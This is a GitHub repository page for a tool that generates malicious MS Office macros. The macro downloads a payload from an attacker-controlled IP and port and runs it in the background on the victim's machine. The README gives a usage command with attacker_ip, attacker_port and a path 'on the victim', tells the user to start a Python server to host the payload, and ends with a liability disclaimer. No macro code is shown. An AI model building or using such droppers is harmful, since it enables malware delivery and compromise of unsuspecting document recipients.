Skip to content

Sh7yk/Download-Macros-Generator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 

Repository files navigation

## Description

The script will generate a macro that can be placed in an MS Office document. The macro will download your payload and run it in the background 

##Usage
```
chmod +x downloading_macros_generator.py
python3 downloading_macros_generator.py --ip <attacker_ip> --port <attacker_port> --payload </path/to/payload.exe> ----upload-to <C:\\path\\to\\upload\\on\\the\\victim.exe>
```
Don't forget startaup your python server

## I am not responsible for the actions you will perform using this tool. Stay ethical and law abiding!

About

script for generating a macro that can be embedded in an MS Office document to load the payload.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages